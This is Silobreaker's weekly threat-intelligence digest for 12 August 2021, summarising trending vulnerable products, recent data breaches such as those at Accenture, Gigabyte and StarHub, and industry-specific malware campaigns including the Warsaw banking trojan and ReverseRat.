12 August 2021

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Microsoft Edge
cPanel
Microsoft NET Core
Foxit PhantomPDF
Palo Alto Networks PAN-OS
Deep & Dark Web
Name Heat 7
NVIDIA GeForce Now
Microsoft Exchange Server Enterprise
Cobalt Strike
Linux OS
Google Gmail

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company Information Affected
Chamber of Deputies (Luxembourg) The Chamber of Deputies accidentally published the names and addresses of public petition signatories on its website. The data was accessible from at least June 2021 until August 2nd, 2021. 24,000
University of Kentucky (US) The university discovered a vulnerability on its website that may have allowed an unauthorised party to obtain a copy of a College of Education database. The database contained names and email addresses of students and teachers.  335,000 
Ibex Limited (US) Ibex reported that a cyberattack originally disclosed in October 2020 led to a data breach that could have impacted information linked to certain employees and their families. An investigation revealed that the threat actors may have accessed data between July 27th and August 17th, 2020. 24,000
Gigabyte Technology (Taiwan) The manufacturer suffered a cyberattack on August 3rd, 2021, that affected a small number of its servers. The operators of RansomEXX ransomware appear to be behind the attack and threatened to leak 112GB they claim to have stolen. This includes data from an internal Gigabyte network and an American Megatrends Git Repository. Unknown
Ermenegildo Zegna (Italy) The operators of RansomEXX ransomware claim to have stolen 20.74GB of data from the fashion house and leaked 43 archives.  Unknown
Vision for Hope (US) The company disclosed that an unauthorised actor accessed an email account belonging to a Hope employee from February 14th to April 2nd, 2021. The account contained names, dates of birth, Social Security numbers, financial account data, medical treatment information, diagnosis information, and more. Unknown
StarHub (Singapore) The telecommunications company discovered their customers’ personal information on a third-party data dump website on July 6th, 2021. The discovered file reportedly contains the mobile numbers, email addresses, and identity card numbers of StarHub subscribers whose memberships date back to before 2007. The origin of the leak is unknown. 57,191
Transamerica Corporation (US) The insurance company suffered a data leak caused by a configuration mistake during a website upgrade on June 14th, 2021. Some clients were able to access the information about the retirement contributions of other companies. Potentially accessed details include names, addresses, Social Security numbers, dates of birth, and financial details of the retirement plans. Unknown
The New York City Education Department (US) The department disclosed that the academic records and biographical data of the city’s public school students and department staff was inadvertently leaked. At least one student within the public school system was able to access a Google Drive that contained sensitive data. 3,100
Illinois State Police (US) The police confirmed that its Firearm Owners Identification (FOID) card portal was targeted in a cyberattack. The personal information of individuals with FOID cards may have been compromised. 2,000
Chanel Korea The company stated that the personal information of some of its customers was stolen after parts of its database were compromised between August 5th and August 6th, 2021. Personal information stored on the database included customers’ names, birthdays, phone numbers, addresses, sex, email addresses, and product purchase lists.  Unknown
SeniorAdvisor (US) WizCase researchers discovered a misconfigured Amazon S3 bucket that exposed the names, emails, and phone numbers of individuals identified as leads. The data appears to date between 2002 and 2013. The bucket also contained around 2,000 anonymous reviews that could be linked to the personal information of the reviewers. 3,000,000
Greenway Health (US) A dark web forum user claims to have encrypted the company’s data on July 15th, 2021, and published 746MB of the data as proof of the attack. The files contained some personal information of individuals. Greenway stated that the company’s former client, and not Greenway, was targeted in the attack. Unknown
Charlotte-Mecklenburg Schools  (US) On August 6th, 2021, the school sent an email to ‘hundreds’ of parents exposing medical information, parents’ phone numbers, and other sensitive student data. 3,000
Crytek (Germany) The company confirmed that it was targetd in a ransomware attack in October 2020. The attack was previously attributed to Egregor attackers. Documents were stolen in the attack and subsequently leaked. The exposed information included names, job titles, company names, business addresses, phone numbers, and more. Unknown
Electromed Inc (US) The company stated that an unauthorised actor gained access to its systems and stole data on customers and employees. Unknown
Multiple US School Districts Researchers at Databreaches[.]net identified numerous K12 school districts hit by Pysa ransomware. The attacks took place in 2020 and 2021. The schools include Affton School District, Gering Public Schools, Palos Community Consolidated School District 118, Brookfield Public Schools, Winters Independent School District,  Sheldon Independent School District, Logansport Community School Corporation and Zionsville Community Schools. Unknown
Accenture (Ireland) The global IT consultancy confirmed that it was targeted in a Lockbit 2.0 ransomware attack. The attackers claim to have stolen 6TB of data and are demanding $50 million. On August 11th, 2021, the attackers released some stolen files, which primarily  consisted of marketing material, and threatened to release more data. Unknown
OT Group (Singapore) The real estate group received an email from a third party claiming to have accessed its IT network. It is currently investigating the nature and extent of the breach. DataBreaches[.]net noted that a comment on its reporting of the breach appears to show the threat actor ALTDOS claiming responsibility for the attack. Unknown

Ransomware mentions in Technology

Time Series

This chart shows the trending ransomware related to the Technology Industry within a curated list of cyber sources over the past week.

Weekly Industry View

Industry View
Industry Information
Banking & Finance Segurança Informática discovered a new Latin American banking trojan, dubbed Warsaw, that uses a customised version of Horus Eyes RAT as its second-stage payload. The remote access trojan allows for full control over a victim’s device. The .NET banker Warsaw uses an overlay window mimicking Santander to trick a user into downloading a PE file in the form of an executable. The researchers found that the name of the Telegram bot creator, Banking171, shows similarities to Anubis171, a name linked to the Brazilian ANUBIS phishing network discovered in December 2020. It is unclear whether the two are connected in some way, but the researchers pointed out that the Warsaw threat actor also originates from Brazil.
Technology Researchers at Crowdstrike reported that the criminal actor PROPHET SPIDER, which has been active since at least May 2017, is exploiting Oracle WebLogic flaws to access target environments. The researchers identified PROPHET SPIDER commonly compromising Linux systems before moving into Windows-based environments with compromised credentials via Telnet, SSH or SMB. In two separate incidents PROPHET SPIDER infections preceded ransomware deployment, namely Egregor and MountLocker ransomware. 
Retail & Hospitality Researchers at RiskIQ identified the infrastructure used by Magecart Group 8. The group, which has been active since 2016, targets the home improvement sector and uses the same skimmer and techniques that were first reported on by RiskIQ in 2017. The researchers found that the group used bulletproof hosting providers such as Flowspec, JSC TheFirst, and OVH, before transitioning potentially inactive infrastructure to legitimate hosting services such as Velia[.]net, WorldSteam, and Amazon. RiskIQ stated that the ‘sheer amount’ of infrastructure used by Magecart Group 8 indicates that the group has been continually successful in their skimming operations.
Cryptocurrency The cross-chain protocol Poly Network was targeted in a cyberattack which resulted in attackers stealing $611 million. According to The Block Research, the attack was the result of a cryptography issue. The attack also impacted the trading pool O3, who suspended its cross-chain functionality. Among the stolen tokens were $273 million in Ethereum, $253 million tokens on Binance Smart Chain, and $85 million in USDC. The attacker has since returned about half of the stolen funds.
Government Lumen Technologies researchers identified an updated version of ReverseRat, a remote access trojan first observed being used by a suspected Pakistan threat actor in June 2021. Recent attacks targeted at least one government entity and other organisations in Afghanistan, as well as a small number of organisations in Jordan, India and Iran. The malware is delivered via a ZIP file containing a Microsoft shortcut file that fetches an HTA file from a compromised WordPress site. Once decoded and executed, the file serves a decoy PDF referencing a supposed United Nations briefing session alongside a malicious payload. ReverseRat was previously installed in parallel with the AllaKore agent, however, a new agent, called NightFury, now runs before ReverseRat is installed. The malware is executed via the sideloading technique using different Microsoft binaries.

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Silobreaker Weekly Cyber Digest

Sign up for weekly news on data breaches, hacker groups, malware and vulnerabilities.

Silobreaker
This website uses cookies.
See our privacy policy at www.silobreaker.com/legal